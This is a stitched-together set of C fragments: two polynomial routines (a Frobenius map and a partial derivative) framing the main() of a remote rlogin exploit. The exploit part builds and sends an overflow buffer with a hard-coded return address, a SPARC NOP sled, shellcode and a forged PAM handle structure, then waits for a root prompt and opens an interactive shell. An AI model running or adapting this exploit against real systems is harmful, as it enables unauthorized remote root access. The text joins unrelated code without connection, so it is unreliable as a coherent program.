/* Frobenius operation by raising varaibles tot the * * pth power. */ struct polynomial frobenius(struct polynomial f) { struct polynomial uit; struct term *fterm; struct term **ptrterm; uit.leading = NULL; ptrterm = NULL; uit.degree = p * f.degree; ptrterm = &(uit.leading); fterm = f.leading; while (fterm) { make_term(ptrterm); sc_copy(fterm->c, (*ptrterm)->c); (*ptrterm)->n1 = p*fterm->n1; (*ptrterm)->n2 = p*fterm->n2; (*ptrterm)->n3 = p*fterm->n3; (*ptrterm)->n4 = p*fterm->n4; ptrterm = &((*ptrterm)->next); fterm = fterm->next; } return(uit); }
/* * main() */ int main(int argc, char **argv) { char buf[BUFSIZE], *p = buf; char c, *host = NULL, term[] = "vt100/9600"; int fd, i, found, len; int timeout = TIMEOUT, debug = 0; /* print exploit information */ fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2); /* parse command line */ if (argc < 2) usage(argv[0]); while ((c = getopt(argc, argv, "dh:t:")) != EOF) switch(c) { case 'h': host = optarg; break; case 't': timeout = atoi(optarg); break; case 'd': debug = 1; break; default: usage(argv[0]); } if (!host) usage(argv[0]); /* connect to the target host */ fd = net_connect(host, 513, 10); fprintf(stderr, "# connected to remote host: %s\n", host); /* signal handling */ signal(SIGPIPE, SIG_IGN); /* begin the rlogin session */ memset(buf, 0, sizeof(buf)); if (send(fd, buf, 1, 0) < 0) fatalerr("send", strerror(errno), fd); if (net_read(fd, buf, sizeof(buf), timeout) < 0) fatalerr("error", "Timeout reached in rlogin session", fd); /* dummy rlogin authentication */ memcpy(p, "foo", 3); // local login name p += 4; memcpy(p, "bar", 3); // remote login name p += 4; memcpy(p, term, sizeof(term)); // terminal type p += sizeof(term); fprintf(stderr, "# performing dummy rlogin authentication\n"); if (send(fd, buf, p - buf, 0) < 0) fatalerr("send", strerror(errno), fd); /* wait for password prompt */ found = 0; memset(buf, 0, sizeof(buf)); while (net_read(fd, buf, sizeof(buf), timeout)) { if (strstr(buf, "assword: ") != NULL) { found = 1; break; } memset(buf, 0, sizeof(buf)); } if (!found) fatalerr("error", "Timeout waiting for password prompt", fd); /* send a dummy password */ if (send(fd, "pass\n", 5, 0) < 0) fatalerr("send", strerror(errno), fd); /* wait for login prompt */ found = 0; memset(buf, 0, sizeof(buf)); fprintf(stderr, "# waiting for login prompt\n"); while (net_read(fd, buf, sizeof(buf), timeout)) { if (strstr(buf, "ogin: ") != NULL) { found = 1; break; } memset(buf, 0, sizeof(buf)); } if (!found) fatalerr("error", "Timeout waiting for login prompt", fd); fprintf(stderr, "# returning into 0x%08x\n", RETADDR); /* for debugging purposes */ if (debug) { printf("# debug: press enter to continue"); scanf("%c", &c); } /* prepare the evil buffer */ memset(buf, 0, sizeof(buf)); p = buf; /* login name */ memcpy(p, "foo ", 4); p += 4; /* return address (env) */ set_val(p, 0, RETADDR); p += 4; memcpy(p, " ", 1); p++; /* trigger the overflow (env) */ for (i = 0; i < 60; i++, p += 2) memcpy(p, "a ", 2); /* padding */ memcpy(p, " BBB", 4); p += 4; /* nop sled and shellcode */ for (i = 0; i < 398; i++, p += 4) memcpy(p, sparc_nop, 4); p += sc_copy(p, sc, sizeof(sc) - 1); /* padding */ memcpy(p, "BBB ", 4); p += 4; /* pam_handle_t: minimal header */ memcpy(p, "CCCCCCCCCCCCCCCC", 16); p += 16; set_val(p, 0, RETADDR); // must be a valid address p += 4; set_val(p, 0, 0x01); p += 4; /* pam_handle_t: NULL padding */ for (i = 0; i < 52; i++, p += 4) set_val(p, 0, 0x00); /* pam_handle_t: pameptr must be the 65th ptr */ memcpy(p, "\x00\x00\x00 AAAA\n", 9); p += 9; /* send the evil buffer, 256 chars a time */ len = p - buf; p = buf; while (len > 0) { fprintf(stderr, "#"); i = len > 0x100 ? 0x100 : len; send(fd, p, i, 0); len -= i; p += i; if (len) send(fd, "\x04", 1, 0); usleep(500000); } fprintf(stderr, "\n"); /* wait for password prompt */ found = 0; memset(buf, 0, sizeof(buf)); fprintf(stderr, "# evil buffer sent, waiting for password prompt\n"); while (net_read(fd, buf, sizeof(buf), timeout)) { if (strstr(buf, "assword: ") != NULL) { found = 1; break; } memset(buf, 0, sizeof(buf)); } if (!found) fatalerr("error", "Most likely not vulnerable", fd); fprintf(stderr, "# password prompt received, waiting for shell\n"); if (send(fd, "pass\n", 5, 0) < 0) fatalerr("send", strerror(errno), fd); /* wait for shell prompt */ memset(buf, 0, sizeof(buf)); found = 0; while (net_read(fd, buf, sizeof(buf), timeout)) { if (strstr(buf, "# ") != NULL) { found = 1; break; } memset(buf, 0, sizeof(buf)); } if (!found) fatalerr("error", "Most likely not vulnerable", fd); /* connect to the remote shell */ fprintf(stderr, "# shell prompt detected, successful exploitation\n\n"); shell(fd); exit(0); }
/* Ouputs the derivative. * * The result is nonsense if the degree of f is too low. */ struct polynomial deriv(struct polynomial f, unsigned int i) { mscalar c; struct polynomial uit; struct term *fterm; struct term **ptrterm; uit.leading = NULL; ptrterm = NULL; fterm = f.leading; switch (i) { case 1: uit.degree = (f.degree > d1) ? (f.degree - d1) : 0; ptrterm = &(uit.leading); while (fterm) { sc_imult(fterm->n1, fterm->c, c); if (!sc_is_zero(c)) { make_term(ptrterm); sc_copy(c, (*ptrterm)->c); (*ptrterm)->n1 = fterm->n1 - 1; (*ptrterm)->n2 = fterm->n2; (*ptrterm)->n3 = fterm->n3; (*ptrterm)->n4 = fterm->n4; ptrterm = &((*ptrterm)->next); } fterm = fterm->next; } return(uit); case 2: uit.degree = (f.degree > d2) ? (f.degree - d2) : 0; ptrterm = &(uit.leading); while (fterm) { sc_imult(fterm->n2, fterm->c, c); if (!sc_is_zero(c)) { make_term(ptrterm); sc_copy(c, (*ptrterm)->c); (*ptrterm)->n1 = fterm->n1; (*ptrterm)->n2 = fterm->n2 - 1; (*ptrterm)->n3 = fterm->n3; (*ptrterm)->n4 = fterm->n4; ptrterm = &((*ptrterm)->next); } fterm = fterm->next; } return(uit); case 3: uit.degree = (f.degree > d3) ? (f.degree - d3) : 0; ptrterm = &(uit.leading); while (fterm) { sc_imult(fterm->n3, fterm->c, c); if (!sc_is_zero(c)) { make_term(ptrterm); sc_copy(c, (*ptrterm)->c); (*ptrterm)->n1 = fterm->n1; (*ptrterm)->n2 = fterm->n2; (*ptrterm)->n3 = fterm->n3 - 1; (*ptrterm)->n4 = fterm->n4; ptrterm = &((*ptrterm)->next); } fterm = fterm->next; } return(uit); case 4: uit.degree = (f.degree > d4) ? (f.degree - d4) : 0; ptrterm = &(uit.leading); while (fterm) { sc_imult(fterm->n4, fterm->c, c); if (!sc_is_zero(c)) { make_term(ptrterm); sc_copy(c, (*ptrterm)->c); (*ptrterm)->n1 = fterm->n1; (*ptrterm)->n2 = fterm->n2; (*ptrterm)->n3 = fterm->n3; (*ptrterm)->n4 = fterm->n4 - 1; ptrterm = &((*ptrterm)->next); } fterm = fterm->next; } return(uit); default: printf("Wrong again honey!"); exit(1); } exit(1); }